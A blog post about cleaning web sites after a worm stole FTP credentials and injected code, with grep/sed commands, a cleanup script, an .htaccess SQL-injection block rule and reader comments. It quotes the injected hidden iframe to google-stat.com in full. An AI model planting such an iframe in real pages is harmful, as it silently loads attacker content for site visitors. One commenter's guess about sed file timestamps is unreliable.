anti-hack

It seems we are living through a "new" age of hacking on a mass scale. The target is server-side web apps. When I first found the injection on websites I am currently working on, I thought it was a WordPress hole, but apparently it all happened through unencrypted FTP connections, which, I dare say, I made from a Windows machine. From what I have read, there is a worm or trojan (whatever animal it is) that captures the FTP username and password, then either downloads each index file from the server, injects its code and uploads it back, or injects the code directly on the server during or after the FTP session.

The solution, so far, seems to be this.
Do not use Windows :) No, seriously: first run the antivirus in Windows safe mode, and only then change the FTP password (if you change it before the machine is clean, the new password gets stolen as well). Clean up the infected files on the server and never use plain FTP again. Use SFTP only!

If you found the "little iframe", run the first command below on the server. You need SSH access for this; if you don't have it, ask for it, and if they won't give it to you I suggest changing hosting, or ask them to run it for you (they have to give you SFTP access anyway). The command lists the infected files.

grep -rlF "google-stat" .

If it finds the injection, clean it up with the command below. Be aware that `sed -i` rewrites every file it visits, whether it matched or not, so the modification time of every file changes; and removing the iframe only removes the symptom. Before trusting the site again, look for anything else the attacker left behind (PHP files you never uploaded, files modified around the same time) and compare against a known-good copy if you have one.

find . -type f -exec sed -i 's/<iframe src="http:\/\/google-stat.com\/tomi\/?t=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g' {} \;
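As an added example (not from the original post), here is a small script that does the same search-and-strip, but only rewrites the files that actually contain the injection, so clean files are never touched and keep their modification times. It assumes a POSIX shell and GNU sed (for `-i`); the web root it works on is constructed inside the script for demonstration, and the marker and iframe string are the ones quoted above.

```shell
#!/bin/sh
# Added example, not from the original post. Builds a small constructed web
# root, lists the files carrying the injected iframe, and strips the iframe
# only from those files, so clean files are never rewritten (their mtimes stay
# untouched). Assumes a POSIX shell and GNU sed (for -i); the marker and the
# iframe string are the ones quoted in the post.

IFRAME='<iframe src="http://google-stat.com/tomi/?t=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>'
MARKER='google-stat'

# sed_escape STRING: backslash-escape the characters that are special in a
# sed basic regular expression so the iframe is matched literally.
sed_escape() {
    printf '%s' "$1" | sed 's/[][\.*^$]/\\&/g'
}

# make_sample_site DIR: constructed sample tree with two infected files
# (one in a directory whose name contains a space) and one clean file.
make_sample_site() {
    mkdir -p "$1/sub dir"
    printf '<html><body>hello</body></html>\n%s\n' "$IFRAME" > "$1/index.html"
    printf '<?php echo "ok"; ?>\n%s\n' "$IFRAME" > "$1/sub dir/page.php"
    printf '<html><body>clean</body></html>\n' > "$1/clean.html"
}

# list_infected DIR: print every file under DIR containing the marker.
# -r recursive, -l file names only, -F fixed string (no regex surprises).
list_infected() {
    grep -rlF "$MARKER" "$1"
}

# count_infected DIR: number of infected files (0 when none are left).
count_infected() {
    list_infected "$1" | wc -l | tr -d ' '
}

# clean_infected DIR: remove the exact iframe from the infected files only.
# '#' is the s/// delimiter because the iframe contains '/' but no '#'.
clean_infected() {
    pattern=$(sed_escape "$IFRAME")
    list_infected "$1" | while IFS= read -r f; do
        sed -i "s#${pattern}##g" "$f"
    done
}

# Stand-alone demonstration on a throwaway directory.
main() {
    root=$(mktemp -d)
    make_sample_site "$root"
    echo "infected files before cleaning: $(count_infected "$root")"
    list_infected "$root"
    clean_infected "$root"
    echo "infected files after cleaning: $(count_infected "$root")"
    rm -rf "$root"
}

main "$@"
```

On a real site, drop `make_sample_site` and `main`, point `clean_infected` at the web root, and keep a copy of the output of `list_infected` as the list of files the attacker touched; that list is what you compare against a backup later.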

Here is another helper, for .htaccess (it needs mod_rewrite and `RewriteEngine On` above it):
RewriteCond %{QUERY_STRING} ^.*(;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|cast|set|declare|drop|update|md5|benchmark).* [NC]
RewriteRule .* - [F]
It returns 403 for any request whose query string contains a quote, angle bracket or similar character followed by a SQL keyword, which stops the noisiest SQL-injection probes. It is a crude blocklist, though: it can be bypassed with other encodings, it can block legitimate requests that happen to contain words like "set" or "update", and it does nothing against the FTP-credential theft described above.

If you are on Dreamhost (and even if you are not), have a look here:

http://wiki.dreamhost.com/Troubleshooting_Hacked_Sites

Comments
  • Harry @ 03/05/2009 -

    If I don’t want to change the time/date of all the files, which aren’t infected – how do I do that?

  • 2046 @ 06/08/2009 -

    I think it won't change the file if it doesn't find the text. I haven't checked it though, so do not take me seriously. The only way I can think of is to find the infected files, then run the command with the name of the file after the find. In the example there is find /* … (it does it for all files) and in your case it should be find /the/path/to/file … but this will probably be really tiring to do one by one.
    …btw sorry for the huuuuge delay.

    o—-o.info